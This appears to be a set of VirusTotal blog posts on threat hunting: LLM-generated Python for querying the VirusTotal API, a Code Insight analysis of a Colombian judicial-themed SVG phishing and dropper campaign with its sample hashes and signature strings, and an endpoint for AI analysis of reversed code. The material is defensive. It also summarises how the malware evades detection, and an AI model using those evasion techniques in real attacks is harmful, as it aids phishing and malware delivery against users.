# Check if necessary columns exist in df_flat
if 'lnk_info.machine_id' in df_flat.columns and 'exiftool.TargetFileDOSName' in df_flat.columns:

    # Calculate the frequency of each machine ID and target file name pair
    pair_frequencies = df_flat.groupby(['lnk_info.machine_id', 'exiftool.TargetFileDOSName']).size().reset_index(name='frequency')

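    # Identify MachineIDs with fewer than 10 occurrences
    machine_id_counts = pair_frequencies.groupby('lnk_info.machine_id')['frequency'].sum().reset_index(name='count')
    other_machine_ids = machine_id_counts[machine_id_counts['count'] < 10]['lnk_info.machine_id']

    # Reconstructed: the published snippet is truncated between the filter above and the link label below.
    # Group infrequent MachineIDs under "Other" and re-aggregate the pairs
    pair_frequencies.loc[pair_frequencies['lnk_info.machine_id'].isin(other_machine_ids), 'lnk_info.machine_id'] = 'Other'
    pair_frequencies = pair_frequencies.groupby(['lnk_info.machine_id', 'exiftool.TargetFileDOSName'])['frequency'].sum().reset_index()

    # Build the node list: MachineIDs first, then target file names
    sources = pair_frequencies['lnk_info.machine_id'].unique().tolist()
    targets = pair_frequencies['exiftool.TargetFileDOSName'].unique().tolist()
    source_idx = {name: i for i, name in enumerate(sources)}
    target_idx = {name: i + len(sources) for i, name in enumerate(targets)}

    fig = go.Figure(data=[go.Sankey(
        node=dict(pad=15, thickness=20, label=sources + targets),
        link=dict(
            source=pair_frequencies['lnk_info.machine_id'].map(source_idx),
            target=pair_frequencies['exiftool.TargetFileDOSName'].map(target_idx),
            value=pair_frequencies['frequency'],
            # Hover text for each link: "MachineID -> TargetFileDOSName: frequency"
            label=pair_frequencies.apply(lambda row: f"{row['lnk_info.machine_id']} -> {row['exiftool.TargetFileDOSName']}: {row['frequency']}", axis=1)
        )
    )])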

    fig.update_layout(title_text="MachineID to TargetFileDOSName Sankey Diagram (Infrequent MachineIDs grouped as 'Other')", font_size=10)
    fig.show()
else:
    print("Required columns 'lnk_info.machine_id' or 'exiftool.TargetFileDOSName' not found in the DataFrame.")

This will create a powerful visualization that shows how different machines are being targeted with specific files, allowing us to identify patterns tied to each MachineID.

Sankey diagram

4. Analyze the behavior of the LNK files.

Finally, you can investigate the behavior of the LNK files themselves, for example, by looking at how they are executed:

Create a pie chart depicting the distribution of window behaviors for LNK target processes (hidden, minimized,...).

Code generated:

import plotly.express as px
import pandas as pd

# Check if the relevant column exists
if 'lnk_info.header.show_window_str' in df_flat.columns and not df_flat['lnk_info.header.show_window_str'].empty:
    # Count the occurrences of each window behavior string
    window_behavior_counts = df_flat['lnk_info.header.show_window_str'].value_counts().reset_index()
    window_behavior_counts.columns = ['Window Behavior', 'Count']

    # Create an interactive pie chart
    fig = px.pie(window_behavior_counts,
                 names='Window Behavior',
                 values='Count',
                 title='Distribution of LNK Target Process Window Behaviors',
                 hover_data={'Count': True})
    fig.show()
else:
    print("The 'lnk_info.header.show_window_str' column was not found or is empty in the flattened data. Cannot create the pie chart.")
Pie chart of window behaviors

This allows you to quickly identify whether the LNK files are trying to hide their execution, a common malware tactic.
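For context, the window behavior of a shortcut comes from the ShowCommand field of the LNK header. The sketch below reads that field directly from raw bytes. The offsets and the three recognized values follow the MS-SHLLINK specification; the function name and the returned labels are illustrative and are not necessarily the strings VirusTotal reports in lnk_info.header.show_window_str.

```python
import struct

# ShowCommand values defined by MS-SHLLINK; any other value is treated as normal.
SHOW_COMMANDS = {
    0x1: "SW_SHOWNORMAL",
    0x3: "SW_SHOWMAXIMIZED",
    0x7: "SW_SHOWMINNOACTIVE",
}

def lnk_show_command(data: bytes) -> str:
    """Return the ShowCommand name from a raw LNK header (hypothetical helper)."""
    if len(data) < 0x4C:
        raise ValueError("too short to contain a ShellLinkHeader")
    (header_size,) = struct.unpack_from("<I", data, 0)
    if header_size != 0x4C:
        raise ValueError("unexpected HeaderSize, not a LNK file")
    # ShowCommand is a 32-bit little-endian integer at offset 0x3C.
    (show_command,) = struct.unpack_from("<I", data, 0x3C)
    return SHOW_COMMANDS.get(show_command, "SW_SHOWNORMAL")
```

A shortcut whose target starts minimized and without activation (SW_SHOWMINNOACTIVE) is usually the value worth a closer look in this kind of hunt.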

5. Geographic Threat Mapping of Submissions

Understanding the geographical distribution of malware submissions can provide crucial insights into whether a campaign is widespread or targeting a specific region. By analyzing the submission metadata for our set of LNK files, an analyst can quickly identify potential hotspots, which could indicate a geographically focused attack. This is achieved by fetching the submissions relationship for each file, extracting the country of origin for each submission, and plotting this data on a world map. Note that the submission country is not necessarily the targeted country, although in some cases the two are related.

Using the LNK files identified previously, create a code snippet that retrieves the submissions relationship for each file. Then, count the number of submissions from each country and display the results on a choropleth world map to visualize the submission hotspots.

In this case, Gemini uses step-by-step execution, which is a sequence of consecutive executions. The code generated was:

Step 1
query_results_with_submissions = []

# Define the search query string for LNK files
query = "fs:2025-01-01+ fs:2025-04-01- p:5+ type:lnk"

# Define the relationship to request
RELATIONS = "submissions"

# Define the relationship attributes to retrieve (all attributes)
ATTRIBUTES_RELATIONS = "*"

# Use cli.iterator to perform an intelligence search with the specified query, relationships, and relationship attributes.
async for itemobj in cli.iterator('/intelligence/search', params={'query': query, 'relationships': RELATIONS, 'relationship_attributes[%s]'%(RELATIONS): ATTRIBUTES_RELATIONS}, limit=0):
    query_results_with_submissions.append(itemobj.to_dict())

# Convert query_results_with_submissions to a list called lnk_files_with_submissions
lnk_files_with_submissions = list(query_results_with_submissions)

# Print the number of LNK files found with submission data.
print(f"Found {len(lnk_files_with_submissions)} LNK files with submission data matching the criteria.")
Step 2
import pandas as pd

# Initialize an empty list to store submission countries
submission_countries = []

# Iterate through each item (LNK file) in the lnk_files_with_submissions list
for item in lnk_files_with_submissions:
    # Check if 'relationships' and 'submissions' exist and are not empty
    if 'relationships' in item and 'submissions' in item['relationships'] and item['relationships']['submissions']['data']:
        # Iterate through each submission object
        for submission in item['relationships']['submissions']['data']:
            # Extract the 'country' from 'submission['attributes']' and append it to the list
            if 'country' in submission['attributes']:
                submission_countries.append(submission['attributes']['country'])

# Convert the submission_countries list into a pandas Series
submission_countries_series = pd.Series(submission_countries)

# Count the occurrences of each country and store in a DataFrame
country_counts = submission_countries_series.value_counts().reset_index()
country_counts.columns = ['country', 'count']

print(f"Total unique countries found: {len(country_counts)}")
print("Top 5 submission countries:")
print(country_counts.head())
Step 3
!pip install pycountry
import plotly.express as px
import pandas as pd
import pycountry

# Function to get ISO-3 code from country name
def get_iso3(country_name):
    try:
        return pycountry.countries.search_fuzzy(country_name)[0].alpha_3
    except Exception:  # lookup failed or the value was not a usable country string
        return None

# Apply the function to get ISO-3 codes
country_counts['iso_alpha'] = country_counts['country'].apply(get_iso3)

# Create a world heatmap using Plotly Express with ISO-3 codes
fig = px.choropleth(country_counts.dropna(subset=['iso_alpha']), # Drop rows where ISO code couldn't be found
                      locations="iso_alpha", # Use ISO-3 codes for locations
                      locationmode='ISO-3',   # Specify ISO-3 location mode
                      color="count",
                      hover_name="country",
                      color_continuous_scale="Viridis",
                      title="Submission Country Heatmap")

# Update layout to increase figure size
fig.update_layout(
    autosize=False,
    width=1000, # Adjust width as needed
    height=600 # Adjust height as needed
)

fig.show()
World heatmap of submissions

More Examples

Here are some other examples of how you can use natural language to query the VirusTotal API:

  • Find malicious Chrome extensions (based on this blog):

This prompt is a good example of how Google Colab runs the step-by-step process. Because the prompt asks several questions at once, Gemini answers them in separate steps.

Retrieve all the samples from the /intelligence/search endpoint with the following query: fs:2025-08-01+ fs:2025-08-14- p:5+ tag:crx have:codeinsight.

Get the bundled_files and create a new dataframe with them too, but store only those having 5 or more malicious value.

Then identify the top 5 magika of those bundled files obtained

Code generated:

Step 1
query_results_with_bundled_files = []

# Define the search query string
query = "fs:2025-08-01+ fs:2025-08-14- p:5+ tag:crx have:codeinsight"

# Define the relationship to request
RELATIONS = "bundled_files"

# Define the relationship attributes to retrieve (all attributes)
ATTRIBUTES_RELATIONS = "*"

# Use cli.iterator to perform an intelligence search with the specified query, relationships, and relationship attributes.
async for itemobj in cli.iterator('/intelligence/search', params={'query': query, 'relationships': RELATIONS, 'relationship_attributes[%s]'%(RELATIONS): ATTRIBUTES_RELATIONS}, limit=0):
    query_results_with_bundled_files.append(itemobj.to_dict())

# Convert query_results_with_bundled_files to a list called crx_files_with_bundled_files
crx_files_with_bundled_files = list(query_results_with_bundled_files)

# Print the number of found CRX files with bundled file data.
print(f"Found {len(crx_files_with_bundled_files)} CRX files with bundled file data matching the criteria.")
Step 2
import pandas as pd

# List to store all bundled file attributes
all_bundled_files_data = []

# Iterate through each CRX file with bundled file data
for crx_file in crx_files_with_bundled_files:
    if 'relationships' in crx_file and 'bundled_files' in crx_file['relationships']:
        for bundled_file in crx_file['relationships']['bundled_files']['data']:
            all_bundled_files_data.append(bundled_file.get('attributes', {}))

# Create a DataFrame from the extracted bundled file attributes
df_bundled_files = pd.json_normalize(all_bundled_files_data)

# Filter for bundled files with 5 or more malicious detections
df_malicious_bundled_files = df_bundled_files[df_bundled_files['last_analysis_stats.malicious'] >= 5]

print(f"Total bundled files extracted: {len(df_bundled_files)}")
print(f"Bundled files with 5 or more malicious detections: {len(df_malicious_bundled_files)}")

df_malicious_bundled_files.head()
Step 3
import pandas as pd
import plotly.express as px

# Check if the 'magika' column exists and is not empty in the filtered DataFrame
if 'magika' in df_malicious_bundled_files.columns and not df_malicious_bundled_files['magika'].empty:
    # Count the occurrences of each magika type
    magika_counts = df_malicious_bundled_files['magika'].value_counts().reset_index()
    magika_counts.columns = ['Magika Type', 'Count']

    # Get the top 5 most frequent magika types
    top_5_magika = magika_counts.head(5)

    print("Top 5 Magika Types in malicious bundled files:")
    print(top_5_magika)

    # Visualize the top 5 magika types
    fig = px.bar(top_5_magika,
                 x='Count',
                 y='Magika Type',
                 orientation='h',
                 title='Top 5 Magika Types in Malicious Bundled Files',
                 labels={'Count': 'Number of Occurrences', 'Magika Type': 'Magika Type'}) 
    fig.update_layout(yaxis={'categoryorder':'total ascending'}) # Order bars by count
    fig.show()
else:
    print("The 'magika' column was not found or is empty in the filtered malicious bundled files DataFrame. Cannot identify top magika types.")
  • Retrieve threat actors:
Retrieve threat actors targeting the United Kingdom with an espionage motivation. Sort the results in descending order of relevance. Display the total number of threat actors and their names.
  • Investigate campaigns:
Retrieve information about threat actors and malware involved in campaigns targeting Pakistan. For each threat actor, retrieve its country of origin, motivations, and targeted industries. For each malware, retrieve its name.

What’s next

This workshop, co-authored with Aleksandar from SentinelLABS, will be presented at future conferences to show the community how to get the most out of the VirusTotal API. We'll be updating the content of our meta colab regularly and will share more information soon about how to access the Google Colab notebook.

In the meantime, if you have any feedback or ideas to contribute, we are open to suggestions.

Supercharging Your Threat Hunts: Join VirusTotal at Labscon for a Workshop on Automation and LLMs

5 September 2025 at 11:53
We are excited to announce that our colleague Joseliyo Sánchez will be at Labscon to present our workshop: Advanced Threat Hunting: Automating Large-Scale Operations with LLMs. This workshop is a joint effort with SentinelOne and their researcher, Aleksandar Milenkoski.

In today's rapidly evolving threat landscape, security professionals face an overwhelming tide of data and increasingly sophisticated adversaries. This hands-on workshop is designed to empower you to move beyond the traditional web interface and harness the full potential of the VirusTotal Enterprise API for large-scale, automated threat intelligence and hunting. 

We will dive deep into how you can use the VirusTotal Enterprise API with Python and Google Colab notebooks to automate the consumption of massive datasets. You'll learn how to track the behaviors of advanced persistent threat (APT) actors and cybercrime groups through practical, real-time exercises. 

A key part of our workshop will focus on leveraging Large Language Models (LLMs) to supercharge your analysis. We'll show how you can use AI to help understand complex data, build better queries, and create insightful visualizations to enrich your information for a deeper understanding of threats. 

This session is ideal for cyber threat intelligence analysts, threat hunters, incident responders, SOC analysts, and security researchers looking to automate and scale up their threat hunting workflows. 

After the workshop, we will publish a follow-up blog post that will delve deeper into some of the exercises and examples presented, providing a valuable resource for further learning and implementation. 

We look forward to seeing you at Labscon! 

(All of the scenarios are compatible with Google Threat Intelligence)

 ---- 
Conference website: https://www.labscon.io/ 
Date: September 17-20, 2025 
Registration: Invite-Only 
Place: Scottsdale, Arizona 
Duration: 3-5h

Uncovering a Colombian Malware Campaign with AI Code Analysis

4 September 2025 at 14:36

VirusTotal Code Insight keeps adding new file formats. This time, we’re looking at two vector-based formats from very different eras: SWF and SVG. Curiously, right after we rolled out this update in production, one of the very first submitted files gave us a perfect, and unexpected, example of Code Insight in action: it uncovered an undetected malware campaign using SVG files that impersonated the Colombian justice system.

Audio version of this post, created with NotebookLM Deep Dive

SWF: a blast from the past

Flash is dead: Adobe killed it in 2020, and browsers stopped supporting it shortly after. But surprisingly, SWF files still show up on VirusTotal. Whether it’s old malware resurging, retro hunting, or long-tail campaigns, they haven’t disappeared completely.

In fact, VirusTotal received 47,812 unique SWF files in the last 30 days that had never been seen before, and 466 of them were flagged as malicious by at least one antivirus engine.

SWF files are binary and compiled. That means Code Insight needs to:

  • Unpack and decompress the container (often zlib or LZMA)
  • Parse the internal tag structure
  • Extract embedded scripts, either ActionScript 2 (AVM1) or ActionScript 3 (AVM2 bytecode + decompiling/disassembling)

Once we lift those scripts into something closer to pseudocode or readable disassembly, the LLM steps in to summarize what the file is doing and why it might be suspicious.
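The first step in the list above, unpacking the container, can be sketched in a few lines. This is a minimal illustration and not Code Insight's implementation: it relies on the public SWF header layout (a 3-byte signature, a 1-byte version, and a 4-byte little-endian length), handles only uncompressed (FWS) and zlib-compressed (CWS) files, and leaves LZMA (ZWS) and tag parsing out. The function name is hypothetical.

```python
import struct
import zlib
from typing import Tuple

def unpack_swf(data: bytes) -> Tuple[int, int, bytes]:
    """Return (version, declared_length, uncompressed_body) for FWS/CWS input."""
    if len(data) < 8:
        raise ValueError("too short to be a SWF file")
    signature, version = data[:3], data[3]
    # Declared length of the whole file once uncompressed, header included.
    (declared_length,) = struct.unpack("<I", data[4:8])
    if signature == b"FWS":
        body = data[8:]                   # stored uncompressed
    elif signature == b"CWS":
        body = zlib.decompress(data[8:])  # everything after the header is zlib
    elif signature == b"ZWS":
        raise NotImplementedError("LZMA-compressed SWF is not handled in this sketch")
    else:
        raise ValueError("not a SWF file")
    return version, declared_length, body
```

The returned body starts with the frame rectangle, frame rate, and frame count, followed by the tag stream that holds the ActionScript.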

SVG: modern, open, and still abusable

SVG, on the other hand, is very much alive. It’s a standard web format, open, text-based, and everywhere: websites, design tools, build systems. And that’s also why attackers like it.

In the last 30 days alone, VirusTotal received 140,803 unique SVG files that had never been seen before, and 1,442 of them were flagged as malicious by at least one antivirus engine. Curiously, that is roughly 1% with detections, the same proportion as for SWF.
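The two proportions can be checked with a quick calculation using the counts quoted above (the helper name is illustrative):

```python
def detection_rate(flagged: int, total: int) -> float:
    """Percentage of files flagged by at least one engine."""
    return 100.0 * flagged / total

swf_rate = detection_rate(466, 47_812)      # SWF counts quoted earlier
svg_rate = detection_rate(1_442, 140_803)   # SVG counts quoted above

print(f"SWF: {swf_rate:.2f}%  SVG: {svg_rate:.2f}%")
# prints "SWF: 0.97%  SVG: 1.02%"
```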

SVG is just XML with <svg> at the root. If it’s a .svgz, we decompress it first. From there, Code Insight looks for:

  • Embedded JavaScript in <script> tags or event handlers (onload, onclick…)
  • Redirects using javascript: URLs or location.href
  • Obfuscation tricks (CDATA, character entities, base64 payloads, etc.)

Because SVG is plain text, the challenge isn’t unpacking, it’s spotting the malicious logic hiding in plain sight.
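As a rough illustration of the first two checks in the list above, the following sketch walks an SVG document and reports script elements, on* event-handler attributes, and javascript: links. It is a simplified stand-in, not Code Insight's logic: the function name and finding labels are made up for this example, it does not attempt deobfuscation, and for untrusted input a hardened XML parser would be preferable to the standard-library one used here.

```python
import gzip
import xml.etree.ElementTree as ET
from typing import List

def find_script_indicators(raw: bytes) -> List[str]:
    """List script-related constructs found in an SVG or SVGZ document."""
    if raw[:2] == b"\x1f\x8b":            # gzip magic: treat input as .svgz
        raw = gzip.decompress(raw)
    root = ET.fromstring(raw)
    findings = []
    for elem in root.iter():
        # Strip the "{namespace}" prefix ElementTree adds to names.
        tag = elem.tag.rsplit("}", 1)[-1].lower()
        if tag == "script":
            findings.append("script element")
        for name, value in elem.attrib.items():
            attr = name.rsplit("}", 1)[-1].lower()
            if attr.startswith("on"):     # onload, onclick, ...
                findings.append(f"event handler: {attr}")
            if attr == "href" and value.strip().lower().startswith("javascript:"):
                findings.append("javascript: URL")
    return findings
```

A check like this only shows that script is present. Deciding whether the script is malicious is the part that needs the deeper analysis described above.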

Let’s see a couple of examples:

When a SWF is flagged, but isn’t malicious

One common challenge in threat analysis is dealing with files that trigger detections in just a few antivirus engines. They’re not clean, but they’re not clearly malicious either. These gray areas force analysts to dig deeper, often wasting time chasing false positives.

The SWF file in the screenshot is a perfect example.

350422c3915a8a1a1336147f89061b25c8354af58db0050e2f9ef2b384e59f62

It was flagged by 3 out of 63 engines. Enough to raise doubts, but not conclusive. The detections mention known SWF heuristics and an old CVE.

Thanks to Code Insight, we can quickly understand what’s going on. It identifies the SWF as a complex ActionScript-based game, including 3D rendering, sound management, and a full level editor. The analysis also explains why the file might look suspicious: it uses obfuscated classes and cryptographic functions (like RC4 and AES), and gathers system details, techniques often associated with malware, but also common in Flash games to enforce DRM or prevent tampering.

The verdict? No malicious behavior was observed, and now we know why it looked suspicious in the first place.

This kind of context is exactly what Code Insight is designed for: saving time, reducing uncertainty, and helping you focus on real threats.


When AV misses, but Code Insight doesn’t

This second example shows the other side of the coin: a malicious SVG file that evaded all antivirus engines, going completely undetected on VirusTotal. On the surface, it looks clean, but a quick look with Code Insight tells a very different story.

1527ef7ac7f79bb1a61747652fd6015942a6c5b18b4d7ac0829dd39842ad735d

According to Code Insight: “This SVG file executes an embedded JavaScript payload upon rendering. The script decodes and injects a Base64-encoded HTML phishing page impersonating a Colombian government judicial system portal. To deceive the user, it simulates a file download with a progress bar, while in the background, it decodes a second, large Base64 string, which is a malicious ZIP archive, and forces its download.”

We validated this behavior by opening the sample in a controlled environment. As shown in the screenshots below, the fake portal is rendered exactly as described, simulating an official government document download process. The phishing site includes case numbers, security tokens, and visual cues to build trust, all of it crafted within an SVG file.


Despite its zero detections, this SVG hides two layers of abuse:

  • A convincing phishing lure, injected via inline JavaScript and decoded on-the-fly
  • A malware dropper, silently extracting and triggering the download of a ZIP file in the background

This is exactly the kind of threat Code Insight is meant to catch: well-crafted, script-based attacks that fly under the radar.

A deeper look: from one SVG to a full campaign

Curiously, the malicious SVG we highlighted earlier wasn’t just any random sample, it was one of the very first files submitted right after we deployed SVG support in Code Insight. A coincidence? Or were we seeing the tip of something bigger?

Thanks to VirusTotal Intelligence, we can search through our massive sample collection using hundreds of parameters, including queries that look inside Code Insight reports. So we ran:

type:svg AND codeinsight:"Colombian"


And voilà: 44 unique SVG files surfaced, all undetected by antivirus engines, but all flagged by Code Insight as part of the same phishing and malware campaign.

Diving into the source code of these SVGs, we found:

  • Code obfuscation techniques
  • Use of polymorphism, with slight changes in every file
  • And large amounts of dummy (garbage) code to increase entropy and evade static detection.

But Code Insight had no problem cutting through the noise.

One thing stood out: the attackers left Spanish-language comments in their scripts, with phrases like "POLIFORMISMO_MASIVO_SEGURO" and "Funciones dummy MASIVAS". While most of the code changed from sample to sample, those comments stayed exactly the same, a clear weakness, and a perfect signature for a simple YARA rule.


So we wrote a very basic one:


Running a retrohunt over the last year with this basic rule returned 523 matches.
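The matching idea can also be sketched in Python. This is not the YARA rule used for the retrohunt; it is a hypothetical check that flags content containing either of the two comment strings quoted above, which is the same signal a simple string-based rule would rely on.

```python
# Comment strings quoted above; the exact rule conditions are an assumption.
CAMPAIGN_MARKERS = (
    b"POLIFORMISMO_MASIVO_SEGURO",
    b"Funciones dummy MASIVAS",
)

def matches_campaign_comments(content: bytes) -> bool:
    """Return True if any of the known comment strings appears in the file."""
    return any(marker in content for marker in CAMPAIGN_MARKERS)
```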


Sorting by submission time, the first sample dates back to August 14, 2025, also submitted from Colombia, and also with 0 antivirus detections at the time.


We reanalyzed that first sample with the current version of Code Insight, and again, it produced an accurate description of the phishing page and malware dropper, impersonating the Colombian Fiscalía General de la Nación.

Looking deeper, we saw that the earliest samples were larger, around 25MB, and the size decreased over time, suggesting the attackers were evolving their payloads. Most importantly, the distribution vector was email, allowing us to pivot into delivery metadata: senders, subjects, attachment names, and more.


Final thoughts

SWF and SVG are very different formats from very different eras, but both can still cause headaches for analysts.

In the first case, Code Insight helped explain why a SWF file looked suspicious without actually being malicious. In the second, it uncovered malicious behavior in an SVG that had gone completely undetected.

This is where Code Insight helps most: giving context, saving time, and helping focus on what really matters. It’s not magic, and it won’t replace expert analysis, but it’s one more tool to cut through the noise and get to the point faster. And when Code Insight and VirusTotal Intelligence work together, one suspicious sample can become the key to revealing an entire campaign.

Integrating Code Insight into Reverse Engineering Workflows

28 August 2025 at 11:58
More than two years have passed since we announced the launch of Code Insight at RSA 2023. Since then, we have been applying this technology in different scenarios and expanding it to new file formats (1, 2).

As we advance in the automated analysis of new files with Code Insight, we want to offer an alternative that enables the integration of this type of technology into the analysis of disassembled or decompiled code.


Audio version of this post, created with NotebookLM Deep Dive

To that end, we have created a new endpoint that receives code and returns a description of its functionality, highlighting the aspects most relevant to malware analysts. The endpoint can be queried with individual code blocks, and each query can chain in previous analyses, including any modifications or corrections made by the analyst. This significantly reduces the reverse engineering workload by providing the analyst with an assistant that pre-analyzes functions deemed interesting, acquiring knowledge as the analysis proceeds.

This endpoint can be integrated into any reverse engineering tool that processes disassembled or decompiled code. As an implementation example, the VirusTotal plugin for IDA Pro has been updated to support its use from the IDA interface. This offers a simple way to integrate relevant analyses into a notebook, allowing the analyst to keep responses that play a direct role in understanding how the code works.

Endpoint for reversed code queries

Using this new endpoint is quite simple—just make a request to the API as shown in the following example:

import requests

API_URL = 'https://www.virustotal.com'
endpoint = 'api/v3/codeinsights/analyse-binary'
headers_apiv3 = {
    'Accept': 'application/json',
    'Content-Type': 'application/json',
    'x-apikey': API_KEY,  # placeholder: your VirusTotal API key
}

payload = {
    'code': code_base64,          # placeholder: Base64-encoded code to analyze
    'code_type': 'disassembled',  # or 'decompiled'
}

response = requests.post(f'{API_URL}/{endpoint}',
                         json={'data': payload},
                         headers=headers_apiv3)


This Python code corresponds to a request to the endpoint located at ‘https://www.virustotal.com/api/v3/codeinsights/analyse-binary’, in which the code to be analyzed is included in the ‘payload’ variable as follows:

payload = {
    'code': code_base64,
    'code_type': 'disassembled',  # or 'decompiled'
    "history": [
        {
            "request": code_base64,
            "response": {
                            "summary": text,
                            "description": text,
                        },
        },
        {
            "request": code_base64,
            "response": {
                            "summary": text,
                            "description": text,
                        },
        },
    ]
}


The request is divided into two parts: the first includes the code being analyzed (‘code’ and ‘code_type’), and the second includes previous requests—potentially reviewed by the analyst—that provide context for analyzing the queried code.

This request returns a general description of how the submitted code snippet works ("summary") and a second text that describes in more detail how that functionality is carried out ("description"). The analyst can then quickly check whether the function contains any behavior of interest, and either review the execution steps or discard the function as irrelevant.
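As a minimal sketch of how such a request body might be assembled, the helper below Base64-encodes the code and attaches an optional history. The field names ('code', 'code_type', 'history', and the outer 'data' wrapper) are taken from the examples above; the function name and the validation are assumptions made for illustration.

```python
import base64
from typing import Dict, List, Optional

def build_request_body(code: str, code_type: str,
                       history: Optional[List[Dict]] = None) -> Dict:
    """Build the JSON body for the analyse-binary endpoint (hypothetical helper)."""
    if code_type not in ("disassembled", "decompiled"):
        raise ValueError("code_type must be 'disassembled' or 'decompiled'")
    payload = {
        "code": base64.b64encode(code.encode("utf-8")).decode("ascii"),
        "code_type": code_type,
    }
    if history:
        # Previous requests and their (possibly analyst-edited) responses.
        payload["history"] = history
    return {"data": payload}
```

The returned dictionary can be passed as the json argument of requests.post, in place of the inline {'data': payload} used earlier.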

New version of the VT-IDA Plugin for IDA Pro

Along with this new endpoint, we have updated the VirusTotal plugin to show how this new functionality can be integrated into the analyst's workflow.

This new functionality can be used as follows:
  1. The analyst selects a function from the disassembled or decompiled code to be analyzed.
  2. If the response provided by the endpoint is satisfactory and reveals an interesting function, they can click ‘Accept’ to include it in a list of selected functions, which we call the ‘CodeInsight Notebook’. They can also make modifications to the ‘Summary’ and ‘Description’ fields to correct errors or add information that helps put the code in context.
  3. With each new request sent to the endpoint, all previously stored functions are included—along with any modifications made by the analyst. This allows for more accurate analyses based on previously obtained and reviewed results.
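The notebook workflow in the steps above can be modeled with a small data structure. The sketch below is not the plugin's code: the class and method names are hypothetical, and only the shape of each history item ('request' plus a 'response' with 'summary' and 'description') comes from the payload example shown earlier.

```python
import base64
from dataclasses import dataclass, field
from typing import Dict, List

@dataclass
class NotebookEntry:
    code: str          # function code as selected by the analyst
    summary: str       # editable after the endpoint responds
    description: str   # editable after the endpoint responds

@dataclass
class CodeInsightNotebook:
    entries: List[NotebookEntry] = field(default_factory=list)

    def accept(self, code: str, summary: str, description: str) -> NotebookEntry:
        """Store an analysis the analyst considers worth keeping."""
        entry = NotebookEntry(code, summary, description)
        self.entries.append(entry)
        return entry

    def to_history(self) -> List[Dict]:
        """Serialize all stored entries for the 'history' field of a new request."""
        return [
            {
                "request": base64.b64encode(e.code.encode("utf-8")).decode("ascii"),
                "response": {"summary": e.summary, "description": e.description},
            }
            for e in self.entries
        ]
```

Because entries stay mutable, a correction made to a summary or description is automatically reflected in the history sent with the next request.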
Here’s how the new version of the plugin would look after a few iterations on a malware sample:



A practical example

Let's illustrate the benefits of the new plugin with a practical example. Imagine an analyst needs to analyze a malicious binary file to understand its function. This is typically a time-consuming and complex process, but with the help of Code Insight, their workflow becomes significantly more efficient:

  1. Targeted Analysis: The analyst selects a code block they suspect might be malicious and uses the endpoint to get an automated analysis.

    The code shown below implements an anti-disassembly technique aimed at generating disassembled code that hides malicious functionality through a hidden jump to a memory address. Essentially, the resulting disassembled code is unreliable, as it doesn’t accurately represent the code that will actually be executed.



  2. Review and Refinement: At this point, a request is made to obtain an initial analysis of the code. The analyst reviews the response and can modify both the ‘Summary’ and ‘Description’ fields with their own notes or corrections.

    In this case, the obtained code analysis correctly identifies an anti-disassembly technique that modifies the return address. However, it does not provide information about a possible return address that would help the analyst locate the hidden code.

    At this point, the analyst can modify the output provided by the endpoint to explain how this technique works. This way, the acquired knowledge can be used in the analysis of other code blocks within the sample. To do so, the analyst simply needs to include the (reviewed) analysis in the list of analyzed functions by clicking the ‘Accept’ button.



  3. Iterative Analysis and Improved Results: The file analysis continues in such a way that, with each new request, the list of analyzed functions is sent, effectively representing the knowledge acquired from analyzing the code selected by the analyst.


And as shown in the previous image, this knowledge is used in other function queries that employ a technique similar to the one previously discussed—this time providing more details about how it works and alerting the analyst to the possibility of jumping to an address containing hidden code.

Quick Tips

The endpoint offers some interesting features for the analyst. For example, as shown in the following figure, the presence of strings written in languages other than English has been detected, providing a translation and pinpointing their location in memory.



On the other hand, while analyzing assembly code has its own pros and cons compared to decompiled code, we can gain additional benefits by analyzing a decompiled function whose disassembled code has been previously analyzed and stored in the CodeInsight Notebook.

For example, let's look at the decompiled code of a function previously analyzed in its disassembled version:


The image below illustrates how analyzing a decompiled function becomes richer with the help of the previously stored analysis of its disassembled code. This happens because certain features, like text strings, are visible in the disassembled code but often missing from the decompiled version.

As a result, Code Insight can provide a more concise and direct explanation by leveraging the decompiled view, which is supported by the disassembled code.



It is important to highlight that both the endpoint and this new feature of the plugin for IDA Pro are offered in trial mode, with the aim of involving the community in the progress we are making in its application to the field of reverse engineering. Although the results produced by this new functionality have been very positive during the testing phase, it is possible that the output generated by the endpoint may not be 100% accurate and could contain errors or omit some relevant details of the analysis.

We are confident that this new integration will be a great help to analysts who are gradually incorporating LLM capabilities into their workflow. As we continue to harness the power of AI, your feedback is incredibly valuable to us. Stay connected for future updates, and thank you for your continued support.


Applying AI Analysis to PDF Threats

25 August 2025 at 18:08

In our previous post we extended VirusTotal Code Insights to browser extensions and supply-chain artifacts. A key finding from that analysis was how our AI could apply contextual knowledge to its evaluation. It wasn’t just analyzing code in isolation, it was correlating a package's stated purpose (its name and description) with its actual behavior, flagging malicious logic that contradicted its public description. We’re now applying the same idea to one of the most common file formats in the world, the PDF.


Audio version of this post, created with NotebookLM Deep Dive

PDFs are multi-layered. There’s the object tree (catalog, pages, objects, streams, actions, embedded files) and there’s the visible layer (text/images the user reads). Code Insights analyzes both, then correlates: do the document's content, claims, and branding make sense given its internal behaviors? That lets us surface not only classic PDF exploitation (e.g., auto-actions, JS, external launches) but also pure social engineering (phishing, vishing, QR-lures) even when the file has no executable logic. This dual approach allows the AI not only to detect malicious code but also to identify sophisticated scams.
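To make the object-tree side more concrete, the sketch below counts a few PDF name tokens commonly associated with active content (automatic actions, JavaScript, external launches, embedded files). It is a crude byte-level triage in the spirit of keyword scanners, not how Code Insights works: the function name and keyword list are choices made for this example, and names hidden inside compressed object streams or written with #xx hex escapes will be missed.

```python
import re
from collections import Counter

# PDF name tokens often tied to active behavior (illustrative selection).
ACTIVE_NAMES = (b"/OpenAction", b"/AA", b"/JavaScript", b"/JS", b"/Launch", b"/EmbeddedFile")

def count_active_names(pdf_bytes: bytes) -> Counter:
    """Count occurrences of each name token in the raw PDF bytes."""
    counts = Counter()
    for name in ACTIVE_NAMES:
        # The lookahead stops "/AA" from matching inside a longer name.
        pattern = re.escape(name) + rb"(?![A-Za-z0-9])"
        counts[name.decode("ascii")] = len(re.findall(pattern, pdf_bytes))
    return counts
```

A document where every count is zero can still be malicious, which is exactly the social-engineering scenario the following cases illustrate.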

Let's look at real-world samples surfaced by Code Insights during its initial testing phase. We'll start with cases where the PDF contains no malicious code, which traditional engines often miss because there's no executable payload to detect. This is where Code Insights proves useful, identifying clear signs of fraud and social engineering that aim to manipulate the user, not the machine.


Case 1 - Fake debt collection targeting financial fraud

